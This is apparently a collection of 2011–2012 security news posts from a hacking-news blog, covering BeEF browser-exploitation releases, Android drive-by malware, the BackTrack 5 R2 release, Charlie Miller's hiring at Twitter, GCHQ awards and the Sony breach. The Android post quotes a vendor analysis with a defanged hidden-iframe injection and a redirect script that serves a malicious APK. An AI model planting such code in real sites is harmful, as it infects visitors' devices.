BeEF v0.4.2.8 (Alpha)

BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target.
BeEF hooks one or more web browsers as beachheads for the  launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals.BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple  process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.

This release contains support for the XssRays extension, which is still in pilot stage and will be improved further in the next release. The framework now loads faster due to the dynamically loading modules. The core enhancements has had a great impact on the command module navigation. This should be quite noticeable.
Unfortunately, this release also has a bug that prevents MSF from interacting with BeEF. The author mentions that this will be taken care of pretty soon. Until then, it is recommended that the latest version be downloaded via the SVN repository.

To download BeEF v0.4.2.8-alpha here.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">BeEF v0.4.2.8 (Alpha)"https://www.voiceofgreyhat.com/2011/08/beef-v0428-alpha.html</a>

BeEF v0.4.2.6-alpha

BeEF, the Browser Exploitation Framework is a professional security toolprovided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target.

BeEF hooks one or more web browsers as beachheads for the  launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals.BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Developmenthas focused on creating a modular framework. This has made moduledevelopment a very quick and simple  process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.

This release adds a new Cold Fusion directory traversal exploit. When this module is launched the attack will appear to originate from the hooked browser. Also, a new ‘Detect Social Networks‘ module was implemented! This will determine if the hooked browser is logged into Facebook, GMail or Twitter! Looks like an awesome release! Keep up the good work guys!

Download BeEF v0.4.2.6-alpha (beef-latest-alpha.tar.gz/0.4.2.6alpha.zip) here.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">BeEF v0.4.2.6-alpha"https://www.voiceofgreyhat.com/2011/06/beef-v0426-alpha.html</a>

Microsoft fixed faulty Xbox 360 update by giving free console

Console gamers just can’t catch a break with the video game gods. This time, it is Xbox 360 gamers who can’t play their games. Some Xbox 360 owners are finding a “disk unreadable” or “disk unsupported” error after updating their consoles with the most recent update, where the only fix is to have their consoles replaced, according to TG Daily. At least Microsoft is proactively seeking out affected customers through Xbox LIVE and offering them a new Xbox 360 S (250 GB) plus a one-year free subscription to Xbox LIVE. Kotaku reports that Xbox gamer Avery Penn found out his console is eligible for a new one by email before his DVD drive failed and could no longer load his games. His 360 60GB Pro was bought in 2009 and has a LiteOn DVD drive. Microsoft is certainly learning from Sony’s recent troubles with disgruntled gamers who were locked out of the PSN for nearly a month. According to Kotaku, this update “reflashes the DVD drive to a new stock firmware, and adds support for new XGD3 disk format. It’s this update that allows an extra GB of usable storage on game discs.” Eurogamer’s Digital Foundry blog believes Microsoft is not just being altruistic in offering customers new consoles: the new update is supposed to beef up the console’s ability to detect pirated disks/non-retail disks and prevent them from playing the full game in the future. If your 360 is affected by the firmware update, contact Xbox Support here or DM XboxSupport on Twitter for assistance. Unfortunately, there is no comprehensive list available to check the impact the update may have on your console before you install it. Microsoft did acknowledge the problem “is not specific to older or newer versions of Xbox 360” so there is only one way to find out. Good luck! (Note: This problematic update is not the upcoming one that will allow Xbox LIVE customers to purchase content through their PayPal accounts.)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft fixed faulty Xbox 360 update by giving free console"https://www.voiceofgreyhat.com/2011/05/microsoft-fixed-faulty-xbox-360-update.html</a>

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post- 

How it Works :- 

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

Technical Details :- 

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Hacked Sites Infecting Android Mobiles With "drive-by" Malware"https://www.voiceofgreyhat.com/2012/05/hacked-sites-infecting-android-mobiles.html</a>

Twitter Hires Renowned Apple Hacker Charlie Miller For Twitter Security Team

Twitter Hires Renowned Apple Hacker Charlie Miller For Twitter Security Team

It is almost impossible task for social networks to keep everything safe against hacks and other vulnerabilities. Hackers will constantly find their way around anything that you put in place. So they often deals with hackers & turn themselves to beef up the security level. Social networking giant Twitter exactly did the same thing. The micro-blogging network has hired the famous/infamous Apple hacker, Charlie Miller, to be a part of its security team. Charlie Miller, a popular figure among hackers, broke the news via his Twitter account, saying, “Monday I start on the security team at Twitter. Looking forward to working with a great team there!” Twitter issued a short statement noting that Miller’s title will be that of Software Engineer, but declined to discuss any further details.

Charlie Miller has a background as a Global Exploitation Analyst in the National Security Agency, and has hacked devices running on iOS, OSX, and Android. He is considered to be a white-hat hacker, which means that he hacks to expose vulnerabilities in a system in order to have those weaknesses fixed. Five year ago, Miller was said to be the first to hack the iPhone using the device’s browser, exposing the handset’s vulnerability to security attacks. Several months after this, he was likewise able to hack a MacBook Air in just two minutes. This feat allowed Miller to win the Pwn2Own hacking competition. Miller also showed a way to hijack iPhones through SMS in 2009. In 2011, he used the MacBook power adapter to implant malware on the laptop. In the same year, his license as an Apple developer got revoked because Apple found that he breached the development agreement. 

In more recent times, Miller had been working on Android devices. In June, he was able to overcome Bouncer, Google’s security program. He has furthermore experience in using Near Field Communications to control Samsung and Nokia handsets with a simple wave of another phone that is within the vicinity. 

While talking about Charlie Miller, we must have to take another name and that is Nicholas Allegra, the world-famous hacker known as "Comex", creater of JailbreakMe.com; who later has been hired by Apple itself . In case of Twitter we must have to say, apart from Miller, Twitter also hired Moxie Marlinspike, a hacker who specializes in SSL and VPN encryption.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Twitter Hires Renowned Apple Hacker Charlie Miller For Twitter Security Team"https://www.voiceofgreyhat.com/2012/09/Twitter-Hires-Renowned-Apple-Hacker-Charlie-Miller.html</a>

BackTrack 5 R2 (Penetration Testing Distribution) Released With Kernel 3.2.6 & 42 New Tools

BackTrack 5 R2 (Penetration Testing Distribution) Released With Kernel 3.2.6 & 42 New Tools

The developer of world's most widely used penetration testing distribution named BackTrack officially announce the full release of BackTrack 5 R2. With this release they have closed several bugs, upgraded & added 42 new tools. BT 5 R2 is running custom-built 3.2.6 kernel with the best wireless support available. The developers have also claimed that this the fastest and best release of BackTrack yet. In BackTrack 5 R2 you will find Metasploit 4.2.0 Community Edition, version 3.0 of the Social Engineer Toolkit, BeEF 0.4.3.2, and many other tool upgrades too numerous to mention. 

Newly Added Tool In BackTrack 5 R2:- 

arduino, bluelog, bt-audit, dirb, dnschef, dpscan, easy-creds, extundelete, findmyhash, golismero, goofile, hashcat-gui, hash-identifier, hexorbase, horst,   hotpatch, joomscan, killerbee, libhijack, magictree, nipper-ng, patator, pipal,   pyrit, reaver,  rebind, rec-studio, redfang, se-toolkit, sqlsus, sslyze, sucrack, thc-ssl-dos, tlssled, uniscan, vega, watobo, wce, wol-e, xspy

Rest f other information can be found on the BT Wiki page. To download BackTrack 5 R2 Click Here. If you are already using BT then you can upgrade your version while following the below steps.  

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">BackTrack 5 R2 (Penetration Testing Distribution) Released With Kernel 3.2.6 & 42 New Tools"https://www.voiceofgreyhat.com/2012/03/backtrack-5-r2-penetration-testing.html</a>

GCHQ Awarded 8 UK Universities “Academic Centre of Excellence in Cyber Security Research”

GCHQ Awarded 8UK Universities “Academic Centre of Excellence in Cyber Security Research”

UK is putting more attention on cyber-security. Last Monday GCHQ, the UK's signals intelligence organisation, awarded eight UK universities the 'Academic Centre of Excellence in Cyber Security Research', laying the ground for deeper relationships between the institutions and the government agency. These top eight universities of UK will work closely with GCHQ as centres of excellence for cybersecurity research.
According to GCHQ official release:-
The first eight UK universities conducting world class research in the field of cyber security have been awarded “Academic Centre of Excellence in Cyber Security Research” status by GCHQ in partnership with the Research Councils’ Global Uncertainties Programme (RCUK) and the Department for Business Innovation and Skills (BIS). We hope other universities will also become Centres in the near future as part of an ongoing process.
The Centres of Excellence will benefit the UK by:

• Enhancing the UK’s cyber knowledge base through original research

• Providing top quality graduates in the field of cyber security

• Supporting GCHQ’s cyber defence mission

• Driving up the level of innovation

• The Centres of Excellence will help make the UK government, business and consumers more resilient to cyber attack by extending knowledge and enhancing skills in cyber security.

The eight Universities chosen as Centres of Excellence in Cyber Security Research are:

• University of Bristol    
• Imperial College London
• Lancaster University    
• University of Oxford
• Queen’s University Belfast    
• Royal Holloway, University of London
• University of Southampton    
• University College London

These Centers will be the first to attain Academic Centre of Excellence in Cyber Security Research status and will benefit from:

• Closer collaboration with GCHQ, the UK Cyber Community and industry

• Partnership endorsement in associated publications and prospectuses

• Better understanding of Government and industrial cyber issues

• Helping to formulate the future Cyber Security research agenda

• Extra funding opportunities and £50,000 capital investment

Francis Maude, the minister for cybersecurity, said "These first eight centers will play a vital role in boosting research, expanding our cyber skills base and fostering innovation in the field" He added "We want to make the UK one of the most secure places in the world to do business, by investing in the best expertise to keep pace with technological change." The centres will open for business on 1 July 2012 for five years, during which time GCHQ hopes other universities will beef up their cybersecurity capabilities to meet the criteria for being recognised as centres of excellence.

-Source (GCHQ)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">GCHQ Awarded 8 UK Universities “Academic Centre of Excellence in Cyber Security Research”"https://www.voiceofgreyhat.com/2012/04/gchq-awarded-8-uk-universities-academic.html</a>

Sony says 25 million more accounts hacked

Sony Corp. said Monday that hackers may have taken personal information from an additional 24.6 million user accounts after a review of the recent PlayStation Network breach found an intrusion at a division that makes multiplayer online games.

The data breach comes on top of the 77 million PlayStation accounts it has already said were jeopardized by a malicious intrusion.

The latest incident occurred April 16 and 17 - earlier than the PlayStation break-in, which occurred from April 17 to 19, Sony said.

About 23,400 financial records from an outdated 2007 database involving people outside the U.S. may have been stolen in the newly discovered breach, including 10,700 direct debit records of customers in Austria, Germany, the Netherlands and Spain, it said.

The outdated information contained credit card numbers, debit card numbers and expiration dates, but not the 3-digit security code on the back of credit cards. The direct debit records included bank account numbers, customer names, account names and customer addresses.

Company spokeswoman Taina Rodriguez said Sony had no evidence the information taken from Sony Online Entertainment, or SOE, was used illicitly for financial gain.

"We had previously believed that SOE customer data had not been obtained in the cyber-attacks on the company, but on May 1 we concluded that SOE account information may have been stolen and we are notifying you as soon as possible," Sony said in a message to customers.

Sony said that it shut service Monday morning to Sony Online Entertainment games, which are available on personal computers, Facebook and the PlayStation 3 console. Its most popular games include "EverQuest," "Free Realms" and "DC Universe Online."

The company said it will grant players 30 days of additional time on their subscriptions, along with one day for each day the system is down. It is also creating a "make good" plan for its multiplayer online games.

On Sunday, Sony executives bowed in apology and said they would beef up security measures after an earlier breach caused it to shut down its PlayStation network on April 20. The company is working with the FBI and other authorities to investigate what it called "a criminal cyber attack" on Sony's data center in San Diego, Calif.

The company said it would offer "welcome back" freebies such as complimentary downloads and 30 days of free service to PlayStation customers around the world to show remorse and appreciation.

PlayStation spokesman Patrick Seybold, in a blog post Monday, denied a report that said a group tried to sell millions of credit card numbers back to Sony.

He also said that while user passwords had not been encrypted, they were transformed using a simpler function called a hash that did not leave them exposed as clear text.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Sony says 25 million more accounts hacked"https://www.voiceofgreyhat.com/2011/05/sony-says-25-million-more-accounts.html</a>